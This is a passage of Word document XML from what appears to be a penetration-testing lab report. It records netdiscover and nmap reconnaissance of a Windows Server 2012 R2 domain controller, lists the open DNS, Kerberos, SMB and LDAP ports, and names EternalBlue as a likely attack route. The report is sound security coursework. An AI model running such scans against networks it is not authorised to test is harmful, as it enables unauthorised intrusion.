          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> eth0 -r 192.168.</w:t>
      </w:r>
      <w:r w:rsidR="009239B3" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.0/</w:t>
      </w:r>
      <w:r w:rsidR="009239B3" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A81FDE7" w14:textId="3BD700E2" w:rsidR="003B694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 Result: The output of the tool quickly located an active host with an IP address of 192.168.4.20. More notably, the supplier with its MAC address </w:t>
      </w:r>
      <w:r w:rsidR="000E19BF" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">of </w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">00:0c:29:99 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>9:e</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>8:58 was identified as VMware, Inc. This g</w:t>
      </w:r>
      <w:r w:rsidR="000E19BF" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ave</w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> us an important initial piece of information: The target system </w:t>
      </w:r>
      <w:r w:rsidR="000E19BF" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>was</w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> very likely to be a virtual machine, which is very common in </w:t>
      </w:r>
      <w:r w:rsidR="003B694D" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>modern enterprise environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E84FF27" w14:textId="4250202F" w:rsidR="000E19BF" w:rsidRPr="0022306B" w:rsidRDefault="000E19BF" w:rsidP="003B694D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251652608" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="39AAA8E2" wp14:editId="23E4C6D9">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>344805</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4648200" cy="1536700"/>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jpg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4648200" cy="1536700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F65BF5" w14:textId="139B2E1B" w:rsidR="003B694D" w:rsidRPr="0022306B" w:rsidRDefault="0089073C" w:rsidP="0089073C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 1. </w:t>
      </w:r>
      <w:r w:rsidR="000E19BF" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Using “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>netdiscover</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000E19BF" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000E19BF" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">for performing </w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>detection on the network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E2CC68" w14:textId="77777777" w:rsidR="0089073C" w:rsidRPr="0022306B" w:rsidRDefault="0089073C" w:rsidP="003B694D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E73C0B4" w14:textId="77777777" w:rsidR="0089073C" w:rsidRPr="0022306B" w:rsidRDefault="0089073C" w:rsidP="003B694D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4132CC6D" w14:textId="54BF4997"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After locking in the target IP, we immediately used </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Network Mapper) to conduct an in-de</w:t>
      </w:r>
      <w:r w:rsidR="003B694D" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>pth scan</w:t>
      </w:r>
      <w:r w:rsidR="00864C0E" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D94657" w14:textId="77777777"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 Execute the command: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> -T4 -A 192.168.4.20 (The scan was executed on June 13, 2025)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6C6228" w14:textId="132BC9B5"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The return results of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00864C0E" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>were</w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0089073C" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>very insightful</w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>, providing</w:t>
      </w:r>
      <w:r w:rsidR="003B694D" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> us with decisive attack clues. </w:t>
      </w:r>
      <w:r w:rsidR="00864C0E" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>The O</w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">pen </w:t>
      </w:r>
      <w:r w:rsidR="00864C0E" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>orts and Services</w:t>
      </w:r>
      <w:r w:rsidR="003B694D" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00864C0E" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>dscovered</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00864C0E" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> were</w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFE5740" w14:textId="507ACD62" w:rsidR="009A6ABD" w:rsidRPr="0022306B" w:rsidRDefault="003B694D" w:rsidP="003B694D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>53</w:t>
      </w:r>
      <w:r w:rsidR="009A6ABD" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009A6ABD" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009A6ABD" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> (DNS): </w:t>
      </w:r>
      <w:r w:rsidR="00C168DA" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Port r</w:t>
      </w:r>
      <w:r w:rsidR="009A6ABD" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>unning the Simple DNS Plus service. DNS is the foundati</w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>on of a network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E65E700" w14:textId="3B852B82" w:rsidR="009A6ABD" w:rsidRPr="0022306B" w:rsidRDefault="009A6ABD" w:rsidP="003B694D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>88 /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Kerberos): </w:t>
      </w:r>
      <w:r w:rsidR="00C168DA" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Port running</w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Microsoft Windows Kerberos. This strongly implie</w:t>
      </w:r>
      <w:r w:rsidR="00864C0E" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> that the target is part of the Windows Active Directory domain environment and is a domain controller or domain member.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365BC00B" w14:textId="22F058C4" w:rsidR="009A6ABD" w:rsidRPr="0022306B" w:rsidRDefault="009A6ABD" w:rsidP="003B694D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>139/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> &amp; 445/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> (SMB): </w:t>
      </w:r>
      <w:r w:rsidR="00C168DA" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Port running </w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>the Microsoft-ds service, which is the core protocol of Windows file sharing. Nmap clearly indicate</w:t>
      </w:r>
      <w:r w:rsidR="00864C0E" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> that it </w:t>
      </w:r>
      <w:r w:rsidR="00864C0E" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>was running</w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> on Windows Server 2012 R2. This combination is a classic target of the "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Eternalblue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>" vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E3460D" w14:textId="1E9BDAA0" w:rsidR="009A6ABD" w:rsidRPr="0022306B" w:rsidRDefault="009A6ABD" w:rsidP="003B694D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>389/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> (LDAP): </w:t>
      </w:r>
      <w:r w:rsidR="00C168DA" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Port running </w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">the Microsoft Windows AD LDAP service. LDAP is a protocol </w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>for accessing active directories and may allow anonymous bindings to leak user information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42035BAE" w14:textId="255174FF" w:rsidR="003B694D" w:rsidRPr="0022306B" w:rsidRDefault="003B694D" w:rsidP="003B694D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251653632" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="07B54E17" wp14:editId="51816A99">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>808990</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5274310" cy="298005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980055"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="009A6ABD" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Nmap successfully identified the operating system as Windows Server 2012 R2, and the computer joined the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009A6ABD" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>NZBBC.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009A6ABD" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> domain. This information confirmed our </w:t>
      </w:r>
      <w:r w:rsidR="00864C0E" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>hypothesis</w:t>
      </w:r>
      <w:r w:rsidR="009A6ABD" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> and provided </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="009A6ABD" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>a direction</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="009A6ABD" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> for subsequent internal network penetration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1F9C00" w14:textId="66888A72" w:rsidR="0089073C" w:rsidRPr="0022306B" w:rsidRDefault="0089073C" w:rsidP="0089073C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
